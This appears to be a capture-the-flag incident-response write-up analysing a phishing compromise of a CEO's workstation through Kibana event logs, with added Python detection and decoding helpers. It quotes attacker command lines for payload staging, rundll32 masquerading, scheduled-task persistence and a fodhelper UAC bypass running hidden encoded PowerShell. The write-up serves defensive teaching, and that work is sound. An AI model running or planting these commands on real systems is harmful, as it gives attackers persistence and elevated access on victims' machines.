SCENARIO

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.

The email appeared questionable, but Evan still opened the attachment despite his scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.

Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.

Given the initial findings, you are tasked to analyse and assess the impact of the compromise.

INVESTIGATION

Start in Kibana: open Discover and select the Winlogbeat index, which holds the event logs shipped from the CEO's workstation. Set the time picker to the incident window (August 29 to August 30, 2023) so that only events from that period are in view.

When the attachment is opened, mshta.exe executes at August 29, 2023 23:51:16.738 and spawns xcopy.exe, which copies review.dat from the D: drive into the user's temp folder. EVAN~1.HUT is the 8.3 short name of the Evan.Hutchinson profile, so the destination is C:\Users\Evan.Hutchinson\AppData\Local\Temp\review.dat.

"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat

At 23:51:16.771, rundll32.exe is executed to call the exported function DllRegisterServer in D:\review.dat. The file carries a .dat extension but is loaded as a DLL: masquerading the payload (T1036) and running it through a signed Windows binary (T1218.011, rundll32) are both defence evasion.

"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer

At 23:51:16.809, powershell.exe registers a scheduled task named "Review" that runs rundll32.exe with the argument C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer, i.e. the copied payload with the same export. The trigger is daily at 06:00 and the principal is the current user ($env:username), so the payload re-executes in Evan's context every morning. This is persistence via scheduled task (T1053.005).

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;
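Detection logic for the execution-and-persistence chain above (mshta.exe spawning xcopy.exe, rundll32.exe loading a non-.dll module, PowerShell registering a scheduled task that runs rundll32), as an added example that is not part of the original write-up or the room. The sample events are constructed in Winlogbeat's ECS layout for Sysmon event ID 1 with command lines mirroring the ones quoted; the parent-process attributions, the notepad.exe control event, the field names and the rule names are assumptions made for the example.

```python
import re

# Constructed sample events in the Winlogbeat/Sysmon (ECS) field layout. The
# command lines mirror the ones quoted in this write-up; the parent processes,
# the notepad.exe control event and the exact field names are assumptions.
SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"


def ev(ts, exe, cmd, parent):
    """Build a minimal Sysmon event-ID-1 (process create) record."""
    return {"@timestamp": ts, "winlog": {"event_id": 1},
            "process": {"executable": exe, "command_line": cmd,
                        "parent": {"executable": parent}}}


SAMPLE_EVENTS = [
    ev("2023-08-29T23:51:16.738Z", SYS32 + r"\xcopy.exe",
       r'"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat '
       r'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat',
       SYS32 + r"\mshta.exe"),
    ev("2023-08-29T23:51:16.771Z", SYS32 + r"\rundll32.exe",
       r'"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer',
       SYS32 + r"\mshta.exe"),
    ev("2023-08-29T23:51:16.809Z", PS,
       '"' + PS + '" ' + r"$A = New-ScheduledTaskAction -Execute 'rundll32.exe' "
       r"-Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; "
       r"Register-ScheduledTask Review -InputObject $D -Force;",
       SYS32 + r"\mshta.exe"),
    # Benign control event: must not trigger anything.
    ev("2023-08-29T23:55:00.000Z", SYS32 + r"\notepad.exe",
       r'"C:\Windows\System32\notepad.exe" notes.txt', r"C:\Windows\explorer.exe"),
]

# Children that mshta.exe has no business launching from an office document.
LOLBIN_CHILDREN = {"xcopy.exe", "rundll32.exe", "powershell.exe", "cmd.exe",
                   "wscript.exe", "cscript.exe", "certutil.exe"}
# rundll32 <module>,<export>: capture <module>, quoted or not.
RUNDLL32_MODULE = re.compile(r'^\s*(?:"[^"]*"|\S+)\s+("[^"]*"|[^,\s]+),')
TASK_REGISTRATION = re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the rule names a single process-create event triggers."""
    if event.get("winlog", {}).get("event_id") != 1:
        return []
    proc = event["process"]
    exe = basename(proc.get("executable", ""))
    cmd = proc.get("command_line", "")
    parent = basename(proc.get("parent", {}).get("executable", ""))
    rules = []
    if parent == "mshta.exe" and exe in LOLBIN_CHILDREN:
        rules.append("mshta_spawns_lolbin")          # T1218.005 chain
    if exe == "rundll32.exe":
        m = RUNDLL32_MODULE.match(cmd)
        if m and not m.group(1).strip('"').lower().endswith(".dll"):
            rules.append("rundll32_non_dll_module")  # T1218.011 + T1036
    if exe in ("powershell.exe", "pwsh.exe", "schtasks.exe") and TASK_REGISTRATION.search(cmd):
        rules.append("scheduled_task_registration")  # T1053.005
        if "rundll32" in cmd.lower():
            rules.append("scheduled_task_runs_rundll32")
    return rules


def scan(events):
    """Run detect() over an event list; keep only events that fired a rule."""
    findings = []
    for e in events:
        rules = detect(e)
        if rules:
            findings.append({"timestamp": e["@timestamp"],
                             "process": basename(e["process"]["executable"]),
                             "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["timestamp"], f["process"], ", ".join(f["rules"]))
```

The rules are deliberately keyed on parent/child relationships and on the argument shape rather than on file names, so renaming review.dat would not evade them; the module check is what catches a DLL hidden behind a .dat extension.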

At 23:51:47.608 the payload begins discovery: a series of reconnaissance commands appear whose parent process is the rundll32.exe instance that loaded review.dat, tying the enumeration to the dropped file rather than to an interactive user session.

At 23:54:49, fodhelper.exe spawns powershell.exe. fodhelper.exe is an auto-elevating Windows binary, so a PowerShell child under it is the classic UAC bypass (T1548.002): the attacker is now running elevated without a prompt. The PowerShell command runs with no profile, non-interactive and with a hidden window; it reads the Update value of the key shown as HKCU:Software\Microsoft\Windows Update into $x, then launches a second hidden PowerShell with -enc $x. Whatever is stored in that value is therefore a base64-encoded (UTF-16LE) script staged in the registry, and the next step is to pull that value from the host and decode it.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
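A helper for the decoding step that follows from the command line above, as an added example that is not part of the original write-up or the room. It shows how -EncodedCommand payloads are built (UTF-16LE, then base64), unwraps nested -enc layers, and recognises the case seen here, where the argument is a variable ($x) rather than a literal blob, so the script must be retrieved from the registry value instead. OBSERVED is the command line quoted above; INNER_SCRIPT, STAGED_VALUE, OUTER_SCRIPT and WRAPPED are constructed stand-ins and are not the actual staged payload.

```python
import base64
import re

# -e, -ec, -enc, -EncodedCommand (PowerShell accepts any unambiguous prefix),
# followed by the argument: a base64 blob or, as in this case, a variable.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+(\S+)", re.I)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Decode one -EncodedCommand argument; None if it is not base64 of UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_command_line(cmdline: str, max_depth: int = 5):
    """Follow -enc arguments through nested powershell launches.

    Returns (layers, note): layers holds each decoded script, innermost last;
    note says why unwrapping stopped. A variable argument ($x) means the payload
    was fetched at runtime and is not on the command line at all.
    """
    layers = []
    current = cmdline
    for _ in range(max_depth):
        m = ENC_FLAG.search(current)
        if not m:
            return layers, "no encoded argument"
        arg = m.group(1).strip("'\"")
        if arg.startswith("$"):
            return layers, f"encoded argument is a variable ({arg}); payload lives elsewhere"
        decoded = decode_encoded_command(arg)
        if decoded is None:
            return layers, "argument is not valid base64/UTF-16LE"
        layers.append(decoded)
        current = decoded
    return layers, "max depth reached"


# Constructed inputs. OBSERVED is the command line quoted in the write-up; the
# others are fabricated with encode_for_powershell so there is something to
# decode offline (they are not the real staged payload).
OBSERVED = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden '
            r'-c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); '
            r'powershell -NoP -NonI -W Hidden -enc $x')
INNER_SCRIPT = "Write-Output 'inner payload'"            # stand-in for the real script
STAGED_VALUE = encode_for_powershell(INNER_SCRIPT)       # what a staged Update value looks like
OUTER_SCRIPT = "powershell -NoP -W Hidden -enc " + STAGED_VALUE
WRAPPED = "powershell.exe -enc " + encode_for_powershell(OUTER_SCRIPT)

if __name__ == "__main__":
    print(unwrap_command_line(OBSERVED))
    print(unwrap_command_line(WRAPPED))
    print(decode_encoded_command(STAGED_VALUE))
```

On the real host the value would be read from the key named in the command line (for instance with Get-ItemProperty) and passed to decode_encoded_command; a None result means the value is not a plain -enc payload and was transformed some other way before use.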